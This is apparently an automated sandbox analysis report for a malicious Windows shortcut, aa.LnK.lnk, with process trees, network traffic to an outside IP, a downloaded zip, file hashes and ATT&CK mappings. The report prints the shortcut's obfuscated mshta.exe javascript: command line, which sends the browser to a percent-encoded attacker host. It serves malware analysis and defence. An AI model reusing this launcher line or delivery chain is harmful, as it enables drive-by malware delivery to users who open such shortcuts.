Windows
Analysis Report
aa.LnK.lnk
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- mshta.exe (PID: 3648 cmdline:
"C:\Window s\System32 \mshta.exe " "javascr ipt:window .location. href='%68% 74%74%70%7 3%3A%2F%2F %31%30%32% 2E%31%36%3 5%2E%34%36 %2E%31%34% 35%2F';clo se();" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- iexplore.exe (PID: 6228 cmdline:
"C:\Progra m Files\In ternet Exp lorer\iexp lore.exe" -Embedding MD5: CFE2E6942AC1B72981B3105E22D3224E) - iexplore.exe (PID: 2064 cmdline:
"C:\Progra m Files (x 86)\Intern et Explore r\IEXPLORE .EXE" SCOD EF:6228 CR EDAT:17410 /prefetch :2 MD5: 6F0F06D6AB125A99E43335427066A4A1) - ssvagent.exe (PID: 2676 cmdline:
"C:\PROGRA ~2\Java\jr e-1.8\bin\ ssvagent.e xe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0) - iexplore.exe (PID: 1008 cmdline:
"C:\Progra m Files (x 86)\Intern et Explore r\IEXPLORE .EXE" SCOD EF:6228 CR EDAT:17414 /prefetch :2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
- cleanup
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: frack113: |
Click to jump to signature section
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Zip Entry: |
Source: | Key opened: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | LNK file: |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | 13 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs | Binary.Malware.Nioc |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
false | unknown | |||
false | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
102.165.46.145 | unknown | South Africa | 134121 | RAINBOW-HKRainbownetworklimitedHK | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1524795 |
Start date and time: | 2024-10-03 09:18:44 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 11s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | aa.LnK.lnk |
Detection: | MAL |
Classification: | mal56.winLNK@8/10@0/1 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 184.28.89.167, 2.23.209.149, 2.23.209.158, 2.23.209.182, 2.23.209.176, 2.23.209.179, 2.23.209.189, 2.23.209.177, 2.23.209.185, 2.23.209.150, 204.79.197.200
- Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e11290.dspg.akamaiedge.net, go.microsoft.com, e86303.dscx.akamaiedge.net, any.edge.bing.com, ocsp.digicert.com, www.bing.com.edgekey.net, go.microsoft.com.edgekey.net, ieonline.microsoft.com
- Execution Graph export aborted for target mshta.exe, PID 3648 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtSetValueKey calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
RAINBOW-HKRainbownetworklimitedHK | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
82dc2ea333123943700c0f6b3022789a | Get hash | malicious | Unknown | Browse |
|
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Download File
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4286 |
Entropy (8bit): | 3.8046022951415335 |
Encrypted: | false |
SSDEEP: | 24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne |
MD5: | DA597791BE3B6E732F0BC8B20E38EE62 |
SHA1: | 1125C45D285C360542027D7554A5C442288974DE |
SHA-256: | 5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07 |
SHA-512: | D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DC241724-8157-11EF-8C2D-ECF4BB2D2496}.dat
Download File
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6144 |
Entropy (8bit): | 2.5900896011035437 |
Encrypted: | false |
SSDEEP: | 24:r8GW/Y3GW/QdkwPQbzMMLTzMMZlW8MUHZQS9lW8twT+MuL69lW8hMuL:r8GWeGW42N0TH8x5QL8tvvLD8hvL |
MD5: | B3FC201EC1B775FA798FB912F50C6B56 |
SHA1: | CB6015C8F53439BC8F9E05CC5DC9DC4FDCA1D423 |
SHA-256: | B62CF068DF209F62CC510A604364882BF1834C5F01827291D206E259BCF55845 |
SHA-512: | D935758766B99D1F6738928CA88FD630BC4171CBAB92AF4EF8444852D65FACA6521CA524A18FB286462B684251429569286E8FAB71F99771AE6DB17FED8E5AC6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC241726-8157-11EF-8C2D-ECF4BB2D2496}.dat
Download File
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4096 |
Entropy (8bit): | 1.7223027633152592 |
Encrypted: | false |
SSDEEP: | 12:rl0oXGFTkZiXDrEgm8Gf76FZlXDrEgm8Gn7qw9lgOjg0tz/9lLahd0tyC:rvWG8FlTG8m9l28z9la8y |
MD5: | EF5FCEDDBEA001B7D6332B6364495AFB |
SHA1: | F1844461493E2BF18FBB7C2CE27E2FB3233FD9AA |
SHA-256: | 6514524FFC5D3399F143BA57AFB557321514C6C0AD8C25714A8CED98FC452982 |
SHA-512: | 8266884082E7B612F75B7D27C0DE412B6B6B5A1B4825C56635ADDAD1675D50D77F32FA01DD8DD4C1B38FB66650B0D218EE97B4A3B938572A3BAD09F46E479E87 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC241728-8157-11EF-8C2D-ECF4BB2D2496}.dat
Download File
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 1.7228480451050143 |
Encrypted: | false |
SSDEEP: | 12:rlxAF7KrEgmfe7KF/xrEgmfAB7qw9l+atN0truOUxFo:reKGDxGe9lV8ruOn |
MD5: | 5AAB43FEA026DF926CC8555E28744A5F |
SHA1: | 333A7E22C94DB602F528F3B8410FC297C0BB0550 |
SHA-256: | E25D7E6E6CD466ED47F6F3E74EC501DAF2E99F5B4A9425AA7D7E725785E9A7D0 |
SHA-512: | 3B76C212DA972A179296A3EEF83AAA645131AC3CF351FFC7578426A4E439CB259CED3957A614238340DB42B741231EFEA47937879B7959A0860FF19B2F94C1D0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4286 |
Entropy (8bit): | 3.8046022951415335 |
Encrypted: | false |
SSDEEP: | 24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne |
MD5: | DA597791BE3B6E732F0BC8B20E38EE62 |
SHA1: | 1125C45D285C360542027D7554A5C442288974DE |
SHA-256: | 5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07 |
SHA-512: | D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\DocumentoRserva30513[1].zip
Download File
Process: | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2049 |
Entropy (8bit): | 7.590953038347895 |
Encrypted: | false |
SSDEEP: | 48:5bQex+XKuzRWFXsBdQQQzUInFSMfh5BvQPNCJgjQJhW0QcVF5ve+yCB:aeYLRIsBdYzUqHoFC6jQHQcVF5cCB |
MD5: | CBCB5D352D50305C91D8BF03BB3729B7 |
SHA1: | 94E07C98535DF8F9896511322FB02F959799EFB5 |
SHA-256: | D7FC49EA22BA4176919A7342BA7909EBFC5F76EC4031908BF3262F510030A8D9 |
SHA-512: | 7A67BF8B962E174D2227A34001489B2A7170D7C793A7AF8A02F34D10428F1D7F83BF8D27B90203878C5CE197F81D3D60D6E5D35BA09A3E64C5B2CBBD773F113A |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 89 |
Entropy (8bit): | 4.554566022632337 |
Encrypted: | false |
SSDEEP: | 3:oVXR74HxFi8JOGXnB74HxFNLrFovn:o9qDiqaDNLOv |
MD5: | 20BBA2AE05B0279C1FA89EFB057DB3C6 |
SHA1: | 8DF36792684086543DC8514E83D8D98867EDE270 |
SHA-256: | 256D1059CD04CFBEEF1CAFDAB19EDA579E476EAB8503635BF1C97B54BDAF2D22 |
SHA-512: | 5471FECE26ECEDA49E394AA6CB43589F9C2334A287A27197A16F49CF9C4E217EA8A0CD49594D7A5241E86F0FB8A9C3F97FB95C0FE99BDFD5AC8A40CAA678FDA0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08023629288754439 |
Encrypted: | false |
SSDEEP: | 6:a/vllylvalyPSstMl3+tsMZlU1+yYpylADo1:i9l+atN0truOUT |
MD5: | 2DFBD9DE436BAB97A2850BC9A02D8017 |
SHA1: | 70155D20DF8E334BF9CBEC7AC7AC3A19C805F1CE |
SHA-256: | 30595C648BE2A78D34826A31A251F554F0C5E3C005E5B29D1498473D9DD578D9 |
SHA-512: | F360FCED5F0CCE9E41747A438AD0B893D5FE62FB8CE0B898ECA55BDA8B5BE25C035D2DBDC4534805694B79321AC81522619609972E8B40D2AD1461B279DEFDF0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.06905614974082831 |
Encrypted: | false |
SSDEEP: | 3:alFXEAUolllbll1nltllNlFlVlZmllol/Hflly7l8t5tXlRsltFll2/lsllM/llZ:a/vllLaluqh8tMl3+tsM6GKizuW1 |
MD5: | 8F25D6E8A498DB4B4F5B95B35369A10E |
SHA1: | 742DC0DC6E0DC62696A1E3B00306175AF2E33412 |
SHA-256: | 15B6B1CDFFA3DF1AC6887C9A7EEE83BB96961F6863A85A9F32C74863C302C17D |
SHA-512: | 0E144569A3B7D2B0CA235F8DDD7D22E596FDBB6FA488B64CA91B66794AA8FA772D6C6BB735C19A35E9F1F904A9EC38D0788726593429D0903CCB2063FA746927 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Internet Explorer\iexplore.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.10418991085751793 |
Encrypted: | false |
SSDEEP: | 3:uKXk/2aRe8o0w++3KXRlU32o0w+s/lldlRsltFll2/lsllO5yDXB72rtl:FVxKBl+Btlql3+ts2wR70 |
MD5: | CE52AA046EFAB4C2E89808523718B7F5 |
SHA1: | 8161F70B5577084CA02090DFA50537E44EA1BE93 |
SHA-256: | CB378EDFA2143486BEF4FA310C95ECB9ABDBC3019C5479CC6618AEBA0AABD6E9 |
SHA-512: | 37A98761328C8702C21DDD706C6194966CE02170F52D7EBD55352BC4139B6C4145B351546216F65492686D13A5D80EAD692A5FC3BED7D068DDB7658BC219501D |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.477735140598256 |
TrID: |
|
File name: | aa.LnK.lnk |
File size: | 1'234 bytes |
MD5: | c15e90f68dc8a127205072910f55ff41 |
SHA1: | 079c39646eb91f4c24152943e5d18c285f6a53e5 |
SHA256: | 342cdec573452a0280dda91354b37cb724e0fbde6744b2ce5d0d6872b8e6bed8 |
SHA512: | 0991c8cc40d28d6da3642e946d310b5c96035f6305fa7b105be9c3821a97bacf0012735fe7df2f7f55b73b041930950c0763cdd23058421837f2ccfefe75192b |
SSDEEP: | 24:8GoIeDdPmZQYfgFi8AE4NFjUuUbCl6+/eB4qrA+QURcobmi4Wh4xOrV:8HIe5PmZDfgF0PpUu+mA4qc+QuyTH |
TLSH: | A921891C0BE64755E2B68B3288E772208E35780BE9B19F1E01D0D68CBC15A41FC65F3A |
File Content Preview: | L..................F.... ....>X5.C...>X5.C...>X5.C..........................;....P.O. .:i.....+00.../C:\...................V.1....."Y-...Windows.@........R.@"Y-...........................G.?.W.i.n.d.o.w.s.....Z.1.....3Y\...System32..B........R.@3Y\....... |
Icon Hash: | 858db080828181ad |
General | |
---|---|
Relative Path: | ..\..\..\Windows\System32\mshta.exe |
Command Line Argument: | "javascript:window.location.href='%68%74%74%70%73%3A%2F%2F%31%30%32%2E%31%36%35%2E%34%36%2E%31%34%35%2F';close();" |
Icon location: |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 3, 2024 09:19:55.287894011 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:55.287936926 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:55.288007975 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:55.289058924 CEST | 49724 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:55.289107084 CEST | 443 | 49724 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:55.289184093 CEST | 49724 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:55.294229984 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:55.294244051 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:55.294346094 CEST | 49724 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:55.294367075 CEST | 443 | 49724 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:55.988456011 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:55.988574028 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.006948948 CEST | 443 | 49724 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.007047892 CEST | 49724 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.036732912 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.036752939 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.036863089 CEST | 49724 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.036875010 CEST | 443 | 49724 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.037053108 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.037163019 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.037640095 CEST | 443 | 49724 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.037724972 CEST | 49724 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.038964987 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.083404064 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.308552980 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.308589935 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.308643103 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.308651924 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
Oct 3, 2024 09:19:56.308974028 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.310074091 CEST | 49723 | 443 | 192.168.2.6 | 102.165.46.145 |
Oct 3, 2024 09:19:56.310096025 CEST | 443 | 49723 | 102.165.46.145 | 192.168.2.6 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.6 | 49723 | 102.165.46.145 | 443 | 1008 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-03 07:19:56 UTC | 261 | OUT | |
2024-10-03 07:19:56 UTC | 395 | IN | |
2024-10-03 07:19:56 UTC | 2049 | IN |
Click to jump to process
Click to jump to process
Click to jump to process
Target ID: | 1 |
Start time: | 03:19:40 |
Start date: | 03/10/2024 |
Path: | C:\Windows\System32\mshta.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d6090000 |
File size: | 14'848 bytes |
MD5 hash: | 0B4340ED812DC82CE636C00FA5C9BEF2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 4 |
Start time: | 03:19:43 |
Start date: | 03/10/2024 |
Path: | C:\Program Files\Internet Explorer\iexplore.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff685ab0000 |
File size: | 834'512 bytes |
MD5 hash: | CFE2E6942AC1B72981B3105E22D3224E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Target ID: | 5 |
Start time: | 03:19:45 |
Start date: | 03/10/2024 |
Path: | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x580000 |
File size: | 828'368 bytes |
MD5 hash: | 6F0F06D6AB125A99E43335427066A4A1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 6 |
Start time: | 03:19:46 |
Start date: | 03/10/2024 |
Path: | C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7f0000 |
File size: | 85'632 bytes |
MD5 hash: | F9A898A606E7F5A1CD7CFFA8079253A0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 7 |
Start time: | 03:19:49 |
Start date: | 03/10/2024 |
Path: | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x580000 |
File size: | 828'368 bytes |
MD5 hash: | 6F0F06D6AB125A99E43335427066A4A1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Function 00000149293A0FC1 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|